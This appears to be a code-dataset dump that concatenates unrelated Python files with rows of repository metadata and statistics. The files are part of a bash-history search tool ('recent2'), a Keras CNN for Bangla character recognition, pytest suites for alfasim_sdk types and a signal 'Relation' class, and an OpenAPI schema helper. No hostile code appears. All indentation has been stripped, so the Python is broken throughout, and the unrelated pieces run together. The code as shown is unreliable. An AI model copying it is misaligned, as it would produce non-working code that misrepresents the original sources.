# (1571012560, "cat bar")]
last_ts = -1
histfile = Path(os.environ.get("HISTFILE", "~/.bash_history")).expanduser()
if not histfile.exists():
return
for line in histfile.read_text().splitlines():
if not line:
continue
if line[0] == '#':
try:
last_ts = int(line[1:].strip())
except Exception:
# Ignore the exception.
pass
continue
history.append([last_ts, line.strip()])
# Phase 2 starts: After this phase history will be like this
# [(1571012545, "ls /"), # Timestamp for this comes from its next entry
# (1571012545, "echo foo"),
# (1571012560, "cat bar")]
last_ts = -1
for i in range(len(history) - 1, -1, -1):
if history[i][0] == -1 and last_ts != -1:
history[i][0] = last_ts
elif history[i][0] != -1 and last_ts == -1:
last_ts = history[i][0]
# Add the history entries into recent's DB.
conn = create_connection()
import random
# Create a session with a random -ve pid and random -ve sequence id.
pid = -random.randint(1, 10000000)
session = Session(pid=pid, sequence=-random.randint(1, 10000000))
session.update(conn)
for cmd_ts, cmd in history:
c = conn.cursor()
c.execute(DB.INSERT_ROW_NO_JSON, [
cmd_ts, cmd, pid,
# exit status=-1, working directory=/unknown
-1, "/unknown", session.id]) # yapf: disable
conn.commit()
conn.close()
# Returns a list of queries to run for the given args
# Return type: List(Pair(query, List(query_string)))
def query_builder(args):
# TODO
#https://docs.python.org/3/library/argparse.html#mutual-exclusion
if args.r and args.s:
sys.exit(Term.FAIL + 'Only one of -re and -sql should be set' + Term.ENDC)
sum_status = sum(1 for x in [args.failure, args.code != -1] if x)
if sum_status > 1:
sys.exit(Term.FAIL + ('Only one of --failure and --code has to be set') + Term.ENDC)
query = DB.TAIL_N_ROWS_TEMPLATE_DEDUP if args.dedup else DB.TAIL_N_ROWS_TEMPLATE
filters = []
parameters = []
if args.session:
filters.append('session = ?')
parameters.append(Session.session_id_string())
if args.failure:
#https://stackoverflow.com/questions/16749121/what-does-mean-in-python
filters.append('return_val != 0')
if args.code != -1:
filters.append('return_val == ?')
parameters.append(args.code)
if not args.self:
# Dont return recent commands unless user asks for it.
filters.append("""command not like 'recent%'""")
if args.pattern:
if args.r:
filters.append('command REGEXP ?')
parameters.append(args.pattern)
elif args.s:
filters.append(args.pattern)
else:
filters.append('command like ?')
parameters.append('%' + args.pattern + '%')
if args.d:
filters.append('pwd = ?')
parameters.append(str(Path(args.d).expanduser().absolute()))
if args.D:
filters.append(parse_date(args.D))
parameters.append(args.D)
for env_var in args.env:
split = env_var.split(":")
if len(split) == 1:
filters.append('json_extract(json_data, "$.env.{}") is not null'.format(split[0]))
else:
filters.append('json_extract(json_data, "$.env.{}") = ?'.format(split[0]))
parameters.append(split[1])
filters.append('length(command) <= {}'.format(args.limit))
try:
n = int(args.n)
parameters.append(n)
except:
exit(Term.FAIL + '-n must be a integer' + Term.ENDC)
where = 'where ' + ' and '.join(filters) if len(filters) > 0 else ''
ret = []
if not args.insensitive:
# No params required for case on query.
ret.append((DB.CASE_ON, []))
query_and_params = query.replace('where', where), parameters
ret.append(query_and_params)
return ret
# Returns true if `item` matches `expr`. Used as sqlite UDF.
def regexp(expr, item):
reg = re.compile(expr)
return reg.search(item) is not None
def make_arg_parser_for_recent():
description = ('recent is a convenient way to query bash history. '
'Visit {} for more examples or to ask questions or to report issues'
).format(Term.UNDERLINE + 'https://github.com/dotslash/recent2' + Term.ENDC)
epilog = 'To import bash history into recent db run {}'.format(Term.UNDERLINE +
'recent-import-bash-history' +
Term.ENDC)
parser = argparse.ArgumentParser(description=description, epilog=epilog)
parser.add_argument('pattern',
nargs='?',
default='',
help='optional pattern to search')
parser.add_argument('-n',
metavar='NUM',
help='max results to return',
default=20)
# Filters for command success/failure.
parser.add_argument('-e',
'--code',
metavar='CODE',
help='int exit status of the commands to return. -1 => return all.',
default=-1)
parser.add_argument('-f',
'--failure',
help='only return commands that exited with failure',
action='store_true')
# Other filters/options.
parser.add_argument('-d',
metavar='DIR',
help='The Directory where the command runs',
default='')
parser.add_argument('-N',
'--session',
help='Returns commands only from current session',
action='store_true')
parser.add_argument('-D',
metavar='DATE',
help='date in YYYY, YYYY-MM, or YYYY-MM-DD formats',
default='')
parser.add_argument('-S',
'--self',
help='Return `recent` commands also in the output',
action='store_true')
parser.add_argument('-L',
'--limit',
help='Ignore commands longer than this.',
default=400)
parser.add_argument('-E',
'--env',
action='append',
help=('Filter by shell env vars. Env vars set in RECENT_ENV_VARS '
'as comma separated list will be captured.'),
metavar='key[:val]',
default=[])
parser.add_argument('-p',
'--dedup',
action='store_true',
help=('Deduplication'))
# CONTROL OUTPUT FORMAT
# Hide time. This makes copy-pasting simpler.
parser.add_argument('-t',
'--time',
help='Displays the local time converted from UTC',
action='store_true')
parser.add_argument('-g',
'--debug',
help='Debug mode',
action='store_true')
parser.add_argument('-l',
'--detail',
help='Return detailed output',
action='store_true')
parser.add_argument(
'-c',
'--columns',
metavar='COL',
help=('Comma separated columns to print if --detail is passed. Valid columns are '
'command_dt,command,pid,return_val,pwd,session,json_data'),
default="command_dt,command,json_data")
# Query type - regex/sql.
parser.add_argument('-r',
help='enable regex search pattern',
action='store_true')
parser.add_argument('-s',
help='enable sqlite search pattern',
action='store_true')
parser.add_argument('-i',
'--insensitive',
help='ignore case distinctions in patterns and data',
action='store_true')
# https://github.com/awaxa/recent2/commit/eeead062675b89489674654e4b5c8def467a2e08
argcomplete.autocomplete(parser)
return parser
def check_prompt(debug):
if os.environ.get('RECENT_CUSTOM_PROMPT'):
if debug:
print("RECENT_CUSTOM_PROMPT is set. Not checking prompt")
return
actual_prompt = os.environ.get('PROMPT_COMMAND', '')
export_prompt_cmd = '''export PROMPT_COMMAND='{}' '''.format(EXPECTED_PROMPT)
if EXPECTED_PROMPT not in actual_prompt:
print(Term.BOLD + "PROMPT_COMMAND env variable is not set. " +
"Add the following line to .bashrc or .bash_profile" + Term.ENDC)
sys.exit(Term.UNDERLINE + export_prompt_cmd + Term.ENDC)
def tty_width():
import shutil
sz = shutil.get_terminal_size(fallback=(0, 0))
return sz.columns
def pad(raw_text, print_text):
allowed_width = min(tty_width() - 30, 50)
to_pad = max(allowed_width - len(raw_text), 0)
return print_text + (' ' * to_pad)
def handle_recent_command(args):
check_prompt(args.debug) # Fail the command if PROMPT_COMMAND is not set
conn = create_connection()
# Install REGEXP sqlite UDF.
conn.create_function("REGEXP", 2, regexp)
# Register the queries executed. (Replace new lines with spaces in the query)
queries_executed = []
def update_queries_executed(inp):
if inp == DB.GET_COMMANDS_TABLE_SCHEMA:
return
trans = inp.replace('\n', ' ')
queries_executed.append(trans)
conn.set_trace_callback(update_queries_executed)
c = conn.cursor()
detail_results = []
columns_to_print = set(args.columns.split(','))
columns_to_print.update(['command_dt', 'command', 'return_val'])
for query, parameters in query_builder(args):
for row in c.execute(query, parameters):
query_columns = DB.TAIL_N_ROWS_DEDUP_COLUMNS if args.dedup else DB.TAIL_N_ROWS_COLUMNS
row_dict = {
query_columns[i]: row[i]
for i in range(len(row))
if query_columns[i] in columns_to_print
}
if 'command_dt' not in row_dict or 'command' not in row_dict:
# Why would we have these entries?
continue
if args.detail:
detail_results.append(row_dict)
continue
colored_cmd = row_dict['command']
if row_dict.get('return_val', 0) > 0:
# Show failed commands in red.
# We do > 0 because for commands we got via import_bash_history, the return_val
# is negative
colored_cmd = Term.FAIL + colored_cmd + Term.ENDC
if args.time:
#https://www.sqlite.org/lang_datefunc.html
#https://groups.google.com/g/comp.lang.python/c/PhtX3V0jsSA/m/7cSdd0y7BQAJ
#https://stackoverflow.com/questions/4770297/convert-utc-datetime-string-to-local-datetime
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
cmd_time = datetime.strptime(row_dict["command_dt"], '%Y-%m-%d %H:%M:%S').replace(tzinfo=from_zone).astimezone(to_zone).strftime("%Y-%m-%d %H:%M:%S")
print(f'{Term.YELLOW}{cmd_time}{Term.ENDC} {colored_cmd}')
else:
print(colored_cmd)
if args.detail:
if 'json_data' not in columns_to_print:
print(tabulate(detail_results, headers="keys"))
else:
for res in detail_results:
for k, v in res.items():
print(Term.BOLD + Term.OKBLUE + k + Term.ENDC + ": " + str(v))
print("---------------------------------")
if args.debug:
schema = None
for row in c.execute(DB.GET_COMMANDS_TABLE_SCHEMA, []):
schema = row[0]
print("=========DEBUG=========")
print("---SCHEMA---")
print(schema)
print("---QUERIES---")
print("To reproduce this output run the following sqlite command")
print("""sqlite3 {} "{}" """.format(recent_db, '; '.join(queries_executed)))
conn.close()
def main():
parser = make_arg_parser_for_recent()
args = parser.parse_args()
handle_recent_command(args)
if __name__ == '__main__':
print("=================")
print("Executing recent from __main__.")
print("This means recent2 is being run via `python recent2.py`")
print("=================")
main()
| 37.620896 | 165 | 0.568119 | 2,986 | 25,206 | 4.649364 | 0.188881 | 0.015559 | 0.026939 | 0.00958 | 0.173522 | 0.116473 | 0.091047 | 0.070302 | 0.056472 | 0.037744 | 0 | 0.016633 | 0.31068 | 25,206 | 669 | 166 | 37.67713 | 0.782388 | 0.131318 | 0 | 0.195817 | 0 | 0.001901 | 0.284954 | 0.031396 | 0.001901 | 0 | 0 | 0.00299 | 0 | 1 | 0.043726 | false | 0.005703 | 0.057034 | 0 | 0.197719 | 0.060837 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3791e586a9b8f892c8036023d9ce18df5f8e863a | 2,499 | py | Python | cnn_model.py | Onimee58/bangla_ocr_cnn | c274d05adbbf2381d0d467ee7fad57fd89bc4019 | [
"MIT"
] | null | null | null | cnn_model.py | Onimee58/bangla_ocr_cnn | c274d05adbbf2381d0d467ee7fad57fd89bc4019 | [
"MIT"
] | null | null | null | cnn_model.py | Onimee58/bangla_ocr_cnn | c274d05adbbf2381d0d467ee7fad57fd89bc4019 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon May 10 04:24:41 2021
@author: Saif
"""
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D
from keras.layers import Dropout, Flatten, Dense
from keras.preprocessing import image
from keras.preprocessing.image import img_to_array, load_img
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
def cnn_model(train_tensors):
model = Sequential()
# First Convolution Layer with Pooling
model.add(Conv2D(filters=16, kernel_size=2, padding='valid', activation='relu', input_shape=(train_tensors.shape[1:])))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.2))
# Adding a second convolutional layer with Pooling
model.add(Conv2D(filters=32, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
# Adding a third convolutional layer with Pooling
model.add(Conv2D(filters=64, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
# Adding a fourth convolutional layer with Pooling
model.add(Conv2D(filters=128, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
# Adding a fifth convolutional layer with Pooling
model.add(Conv2D(filters=256, kernel_size=2, padding='valid', activation='relu'))
model.add(MaxPooling2D(pool_size =2))
model.add(Dropout(0.2))
#model.add(GlobalAveragePooling2D())
model.add(Flatten())
# Full connection Dense Layers
model.add(Dense(256, activation='relu'))
#model.add(Dropout(0.2))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(50, activation = 'softmax'))
model.summary()
return model
def path_to_tensor(img_path):
# loads RGB image as PIL.Image.Image type
img = load_img(img_path, target_size=(64, 64), grayscale=True)
# convert PIL.Image.Image type to 3D tensor with shape (64, 64, 3)
x = img_to_array(img)
# convert 3D tensor to 4D tensor with shape (1, 64, 64, 3) and return 4D tensor
return np.expand_dims(x, axis=0)
if __name__ == "__main__":
cnn_model(path_to_tensor('trial/ka.jpg'))
| 34.232877 | 124 | 0.666667 | 341 | 2,499 | 4.771261 | 0.307918 | 0.108175 | 0.044253 | 0.068838 | 0.476951 | 0.476951 | 0.476951 | 0.426552 | 0.303626 | 0.303626 | 0 | 0.046891 | 0.214886 | 2,499 | 72 | 125 | 34.708333 | 0.782365 | 0.229692 | 0 | 0.289474 | 0 | 0 | 0.043621 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.184211 | 0 | 0.289474 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37940bf72d979b6ddcf361e5f37474a801422c7b | 6,520 | py | Python | tests/plugins/test_types.py | prusse-martin/alfasim-sdk | f6992cb3c1c51e25bf55470508f406ee6c5a5e9b | [
"MIT"
] | 17 | 2019-02-04T12:58:10.000Z | 2021-07-16T12:36:23.000Z | tests/plugins/test_types.py | prusse-martin/alfasim-sdk | f6992cb3c1c51e25bf55470508f406ee6c5a5e9b | [
"MIT"
] | 201 | 2018-08-07T19:39:10.000Z | 2022-03-15T00:20:24.000Z | tests/plugins/test_types.py | prusse-martin/alfasim-sdk | f6992cb3c1c51e25bf55470508f406ee6c5a5e9b | [
"MIT"
] | 5 | 2019-06-07T15:45:34.000Z | 2021-10-13T18:49:52.000Z | import re
import pytest
from alfasim_sdk._internal.types import MultipleReference
from alfasim_sdk._internal.types import Reference
@pytest.mark.parametrize("expression_type", ["enable_expr", "visible_expr"])
def test_enable_expr_and_visible_expr(expression_type):
from alfasim_sdk._internal.types import String
inputs = {"value": "value", "caption": "caption", expression_type: ""}
with pytest.raises(TypeError, match=f"'{expression_type}' must be callable"):
String(**inputs)
def function_definition():
pass
valid_input_1 = {"value": "value", "caption": "caption", expression_type: None}
valid_input_2 = {
"value": "value",
"caption": "caption",
expression_type: function_definition,
}
String(**valid_input_1)
String(**valid_input_2)
def test_string():
from alfasim_sdk._internal.types import String
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
String(value="acme")
with pytest.raises(
TypeError, match=re.escape("'caption' must be 'str' (got 1 that is a 'int')")
):
String(value="acme", caption=1)
with pytest.raises(
TypeError, match=re.escape("'value' must be 'str' (got 1 that is a 'int')")
):
String(value=1, caption="caption")
def test_enum():
from alfasim_sdk._internal.types import Enum
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Enum(values=["s"], initial="")
with pytest.raises(TypeError, match="values must be a list, got a 'str'."):
Enum(values="", caption="caption")
with pytest.raises(
TypeError, match="values must be a list of strings, the item '1' is a 'int'"
):
Enum(values=[1], caption="caption")
with pytest.raises(
ValueError, match='Enum type cannot have an empty string on field "values"'
):
Enum(values=[""], caption="caption")
enum = Enum(values=["value"], caption="caption")
assert enum.initial is None
enum = Enum(values=["value"], initial="value", caption="caption")
assert enum.initial == "value"
with pytest.raises(
TypeError, match="The initial condition must be within the declared values"
):
Enum(values=["value1, value2"], initial="", caption="caption")
@pytest.mark.parametrize("class_", [Reference, MultipleReference])
def test_reference(class_):
from alfasim_sdk._internal.types import TracerType
from alfasim_sdk._internal.models import data_model, container_model
@data_model(caption="caption")
class Data:
pass
@container_model(caption="caption", model=Data, icon="")
class DataContainer:
pass
class InvalidClass:
pass
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
class_(ref_type="")
with pytest.raises(TypeError, match="ref_type must be a class"):
class_(ref_type="", caption="caption")
with pytest.raises(
TypeError,
match="ref_type must be an ALFAsim type or a class decorated with 'data_model'",
):
class_(ref_type=InvalidClass, caption="caption")
error_msg = "ref_type must be an ALFAsim type or a class decorated with 'data_model', got a class decorated with 'container_model'"
with pytest.raises(TypeError, match=error_msg):
class_(ref_type=DataContainer, caption="caption")
error_msg = "The container_type field must be given when ref_type is a class decorated with 'data_model'"
with pytest.raises(TypeError, match=error_msg):
class_(ref_type=Data, caption="caption")
with pytest.raises(ValueError, match='The field "container_type" cannot be empty'):
class_(ref_type=Data, container_type="", caption="caption")
assert (
class_(ref_type=Data, container_type="DataContainer", caption="caption")
is not None
)
assert class_(ref_type=TracerType, caption="caption") is not None
def test_quantity():
from alfasim_sdk._internal.types import Quantity
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Quantity(value="", unit="")
with pytest.raises(TypeError, match="'value' must be <class 'numbers.Real'>"):
Quantity(value="", unit="", caption="caption")
with pytest.raises(
TypeError, match=re.escape("'unit' must be 'str' (got 1 that is a 'int')")
):
Quantity(value=1, unit=1, caption="caption")
def test_table():
from alfasim_sdk._internal.types import Table
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Table(rows=[])
with pytest.raises(TypeError, match="rows must be a list with TableColumn."):
Table(rows=[], caption="caption")
with pytest.raises(TypeError, match="rows must be a list of TableColumn."):
Table(rows=[""], caption="caption")
def test_table_column():
from alfasim_sdk._internal.types import TableColumn, Quantity
with pytest.raises(
TypeError, match="value must be a Quantity, got a <class 'str'>."
):
TableColumn(id="id", value="")
column = TableColumn(
id="id", value=Quantity(value=1, unit="m", caption="CAPTION FOR COLUMN")
)
assert column.caption == column.value.caption
def test_boolean():
from alfasim_sdk._internal.types import Boolean
with pytest.raises(
TypeError, match="missing 1 required keyword-only argument: 'caption'"
):
Boolean(value="")
with pytest.raises(TypeError, match="'value' must be <class 'bool'"):
Boolean(value=1, caption="caption")
def test_file_content():
from alfasim_sdk._internal.types import FileContent
FileContent(caption="Test")
def test_tooltips():
from alfasim_sdk._internal.types import Boolean
field = Boolean(value=True, caption="caption")
assert field.tooltip == ""
field = Boolean(value=True, caption="caption", tooltip="Test123")
assert field.tooltip == "Test123"
expected_msg = re.escape(
"'tooltip' must be <class 'str'> (got 2 that is a <class 'int'>)."
)
with pytest.raises(TypeError, match=expected_msg):
Boolean(value=True, caption="caption", tooltip=2)
field = Boolean(value=True, caption="caption", tooltip="∩ ∪ ∫ ∬ ∭ ∮")
assert field.tooltip == "∩ ∪ ∫ ∬ ∭ ∮"
| 30.900474 | 135 | 0.661963 | 815 | 6,520 | 5.195092 | 0.146012 | 0.09589 | 0.094473 | 0.135805 | 0.608644 | 0.567785 | 0.392537 | 0.268068 | 0.258385 | 0.213982 | 0 | 0.006009 | 0.208742 | 6,520 | 210 | 136 | 31.047619 | 0.811204 | 0 | 0 | 0.293333 | 0 | 0.013333 | 0.258436 | 0 | 0 | 0 | 0 | 0 | 0.053333 | 1 | 0.073333 | false | 0.026667 | 0.1 | 0 | 0.193333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3794ba9a44060b3cd6e66adb831807d3aaf08691 | 6,153 | py | Python | math_signals/test/test_relation.py | Omnivanitate/sweep_design | 00c20066d83a2eebf8402294b413737f49a97564 | [
"MIT"
] | null | null | null | math_signals/test/test_relation.py | Omnivanitate/sweep_design | 00c20066d83a2eebf8402294b413737f49a97564 | [
"MIT"
] | null | null | null | math_signals/test/test_relation.py | Omnivanitate/sweep_design | 00c20066d83a2eebf8402294b413737f49a97564 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
from scipy.integrate import cumulative_trapezoid
from numpy.testing import assert_array_equal
from math_signals.math_relation import Relation
from math_signals.defaults.base_structures import BaseXY
def pre_integr(x, y):
return BaseXY(x=x[1:], y=np.ones(x[1:].size))
class PreTestRelation:
@staticmethod
def pre_test_input(test_case: unittest.TestCase, relation_class: Relation):
input_data = [([1, 2, 3, 4, 5], [10, 20, 30, 40, 50]),
(np.array([1, 2, 3, 4, 5]), np.array([10, 20, 30, 40, 50])),
(np.array([1, 2, 3, 4, 5]), [10, 20, 30, 40, 50]),
([1, 2, 3, 4, 5], np.array([10, 20, 30, 40, 50]))
]
for k in input_data:
with test_case.subTest(k=k):
r = relation_class(*k) # type: Relation
result_x, result_y = r.get_data()
assert_array_equal(result_x, np.array(k[0]))
assert_array_equal(result_y, np.array(k[1]))
input_data_2 = [[[1, 2, 3, 4, 5], [10, 20, 30, 40, 50]],
([1, 2, 3, 4, 5], [10, 20, 30, 40, 50]),
{'x': [1, 2, 3, 4, 5], 'y':[10, 20, 30, 40, 50]}]
for k in input_data_2:
with test_case.subTest(k=k):
r = relation_class(k) # type: Relation
result_x, result_y = r.get_data()
if isinstance(k, dict):
k = list(k.values())
assert_array_equal(result_x, np.array(k[0]))
assert_array_equal(result_y, np.array(k[1]))
@staticmethod
def pre_test_math(test_case: unittest.TestCase, relation_class: Relation):
x = np.array([1, 2, 3, 4, 5], dtype='float')
y1 = np.array([10, 20, 30, 40, 50], dtype='float')
y2 = np.array([2, 4, 6, 8, 10], dtype='float')
r1 = relation_class(x, y1) # type: Relation
r2 = relation_class(x, y2) # type: Relation
operation = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
for m in operation:
for k in [(r2, y2), (2, 2)]:
with test_case.subTest(k=k, m=m):
math_check(r1, k[0], x, y1, k[1], m)
@staticmethod
def pre_test_integrate_diff(test_case: unittest.TestCase, relation_class: Relation):
x = np.array([1, 2, 3, 4, 5, 6])
y = np.array([10, 20, 30, 40, 50, 60])
r = relation_class(x, y) # type: Relation
dr = r.diff()
dx, dy = dr.get_data()
assert_array_equal(dx, x[:-1]+(x[1]-x[0])/2)
assert_array_equal(dy, np.diff(y))
d2r = r.diff().diff()
d2x, d2y = d2r.get_data()
assert_array_equal(d2x, x[:-2]+x[1]-x[0])
assert_array_equal(d2y, np.diff(np.diff(y)))
ir = r.integrate()
ix, iy = ir.get_data()
assert_array_equal(ix, x[1:])
assert_array_equal(iy, cumulative_trapezoid(y))
i2r = r.integrate().integrate()
i2x, i2y = i2r.get_data()
assert_array_equal(x[2:], i2x)
assert_array_equal(i2y, cumulative_trapezoid(cumulative_trapezoid(y)))
same_r = r.integrate().integrate().diff().diff()
same_x, same_y = same_r.get_data()
assert_array_equal(same_x, x[3:-1])
assert_array_equal(same_y, y[3:-1])
same_r2 = r.integrate().diff().integrate().diff()
same_x2, same_y2 = same_r2.get_data()
assert_array_equal(same_x2, x[3:-1])
assert_array_equal(same_y2, y[3:-1])
@staticmethod
def pre_test_interpolate_extrapolate(test_case: unittest.TestCase, relation_class: Relation):
x = [1, 2, 3, 4, 5]
y = [10, 20, 30, 40, 50]
r = relation_class(x, y) # type: Relation
new_x = [1.1, 2.1, 3.1, 4.1, 5.1]
new_r = r.interpolate_extrapolate(new_x)
new_x2, new_y = new_r.get_data()
assert_array_equal(new_x, new_x2)
assert_array_equal(new_y, np.array([11., 21., 31., 41., 0.]))
@staticmethod
def pre_test_convolve_correlate(test_case: unittest.TestCase, r1 , r2, relation_class: Relation):
rconv = relation_class.convolve(r1, r2)
test_case.assertIsInstance(rconv, relation_class)
rcorr = relation_class.correlate(r1, r2)
test_case.assertIsInstance(rcorr, relation_class)
@staticmethod
def pre_test_names(test_case: unittest.TestCase, relation_class: Relation, default_name: str):
r = relation_class([0, 1, 2], [0, 1, 2]) # type: Relation
test_case.assertEqual(r.get_name(), '{0}{1}'.format(default_name, r._quantity-1))
name = 'test'
r2 = relation_class([0, 1, 2], [1, 2, 3], name) # type: Relation
test_case.assertEqual(r2.get_name(), name)
class TestRelation(unittest.TestCase):
pre_cases = PreTestRelation
def test_input(self):
self.pre_cases.pre_test_input(self, Relation)
def test_math(self):
self.pre_cases.pre_test_math(self, Relation)
def test_integrate_diff(self):
self.pre_cases.pre_test_integrate_diff(self, Relation)
def test_interpolate_extrapolate(self):
self.pre_cases.pre_test_interpolate_extrapolate(self, Relation)
def test_conv_corr(self):
r1 = Relation([1, 2, 3, 4, 5], [10, 20, 30, 40, 50])
r2 = Relation([1, 2, 3, 4, 5], [10, 20, 30, 40, 50])
self.pre_cases.pre_test_convolve_correlate(self, r1, r2, Relation)
def math_check(r1, ry, x, y1, y, operation):
r = r1.__getattribute__(operation)(ry) # type: Relation
if operation != '__pow__':
y = y1.__getattribute__(operation)(y)
else:
if isinstance(y1, np.ndarray):
y = np.abs(y1).__getattribute__(operation)(y)*np.sign(y1)
else:
y = y1.__getattribute__(operation)(y)
result_x, result_y = r.get_data()
assert_array_equal(result_x, x)
assert_array_equal(result_y, y)
| 39.191083 | 102 | 0.568178 | 874 | 6,153 | 3.74714 | 0.141876 | 0.070534 | 0.102595 | 0.014656 | 0.458321 | 0.342595 | 0.290382 | 0.214351 | 0.200611 | 0.200611 | 0 | 0.069203 | 0.290752 | 6,153 | 156 | 103 | 39.442308 | 0.681256 | 0.021778 | 0 | 0.170732 | 0 | 0 | 0.012474 | 0 | 0 | 0 | 0 | 0 | 0.203252 | 1 | 0.105691 | false | 0 | 0.04878 | 0.00813 | 0.186992 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3794d2cf81706b3a4b46cdb0956d6d92b0823772 | 4,910 | py | Python | nglp/lib/openapi.py | mauromsl/NGLP-Analytics | d6df05f82dbf2ffa5e136a20b6e89f7ef3bcbef2 | [
"MIT"
] | null | null | null | nglp/lib/openapi.py | mauromsl/NGLP-Analytics | d6df05f82dbf2ffa5e136a20b6e89f7ef3bcbef2 | [
"MIT"
] | 54 | 2021-04-28T05:14:45.000Z | 2021-12-10T09:14:28.000Z | nglp/lib/openapi.py | mauromsl/NGLP-Analytics | d6df05f82dbf2ffa5e136a20b6e89f7ef3bcbef2 | [
"MIT"
] | 1 | 2022-03-09T16:09:25.000Z | 2022-03-09T16:09:25.000Z | from copy import deepcopy
from nglp.lib.seamless import Construct, SeamlessException
class OpenAPISupport(object):
DEFAULT_OPENAPI_TRANS = {
# The default translation from our coerce to openapi is {"type": "string"}
# if there is no matching entry in the trans dict here.
"unicode": {"type": "string"},
"utcdatetime": {"type": "string", "format": "date-time"},
"integer": {"type": "integer"},
"bool": {"type": "boolean"},
"float": {"type": "float"},
"isolang": {"type": "string", "format": "isolang"},
"url": {"type": "string", "format": "url"},
"isolang_2letter": {"type": "string", "format": "isolang-alpha2"},
"country_code": {"type": "string", "format": "country_code"},
"currency_code": {"type": "string", "format": "currency_code"},
"license": {"type": "string", "format": "license_type"},
"persistent_identifier_scheme": {"type": "string", "format": "persistent_identifier_scheme"},
"format": {"type": "string", "format": "format"},
"deposit_policy": {"type": "string", "format": "deposit_policy"},
}
def __init__(self, openapi_trans=None):
self._openapi_trans = openapi_trans if openapi_trans is not None else deepcopy(self.DEFAULT_OPENAPI_TRANS)
# def struct_to_swag(self, struct, schema_title='', **kwargs):
# if not struct:
# if not self._struct:
# raise DataSchemaException("No struct to translate to Swagger.")
# struct = self._struct
#
#
# swag = {
# "properties": self.__struct_to_swag_properties(struct=struct, **kwargs)
# }
# required = deepcopy(struct.get('required', []))
# if len(required) > 0:
# swag["required"] = required
#
# if schema_title:
# swag['title'] = schema_title
#
# return swag
def request_body_section(self, struct):
return {
"requestBody" : {
"content" : {
"application/json" : {
"schema" : self.struct_to_jsonschema(struct)
}
}
}
}
def struct_to_jsonschema(self, struct, path=''):
'''A recursive function to translate the Seamless Struct to JSONSchema'''
if not (isinstance(struct, dict) or isinstance(struct, Construct)):
raise SeamlessException("The struct whose properties we're translating to JSONSchema should always be a dict-like object.")
swag_properties = {}
# convert simple fields
for simple_field, instructions in iter(struct.get('fields', {}).items()):
# no point adding to the path here, it's not gonna recurse any further from this field
swag_properties[simple_field] = self._openapi_trans.get(instructions['coerce'], {"type": "string"})
# convert objects
for obj in struct.get('objects', []):
newpath = obj if not path else path + '.' + obj
instructions = struct.get('structs', {}).get(obj, {})
swag_properties[obj] = {}
swag_properties[obj]['title'] = newpath
swag_properties[obj]['type'] = 'object'
swag_properties[obj]['properties'] = self.struct_to_jsonschema(struct=instructions, path=newpath)["properties"] # recursive call, process sub-struct(s)
required = deepcopy(instructions.get('required', []))
if len(required) > 0:
swag_properties[obj]['required'] = required
# convert lists
for l, instructions in iter(struct.get('lists', {}).items()):
newpath = l if not path else path + '.' + l
swag_properties[l] = {}
swag_properties[l]['type'] = 'array'
swag_properties[l]['items'] = {}
if instructions['contains'] == 'field':
swag_properties[l]['items'] = self._openapi_trans.get(instructions['coerce'], {"type": "string"})
elif instructions['contains'] == 'object':
swag_properties[l]['items']['type'] = 'object'
swag_properties[l]['items']['title'] = newpath
swag_properties[l]['items']['properties'] = self.struct_to_jsonschema(struct=struct.get('structs', {}).get(l, {}), path=newpath)["properties"] # recursive call, process sub-struct(s)
required = deepcopy(struct.get('structs', {}).get(l, {}).get('required', []))
if len(required) > 0:
swag_properties[l]['items']['required'] = required
else:
raise SeamlessException("Instructions for list {x} unclear. Conversion to JSONSchema only supports lists containing \"field\" and \"object\" items. Found: {y}".format(x=newpath, y=instructions['contains']))
return {"properties" : swag_properties}
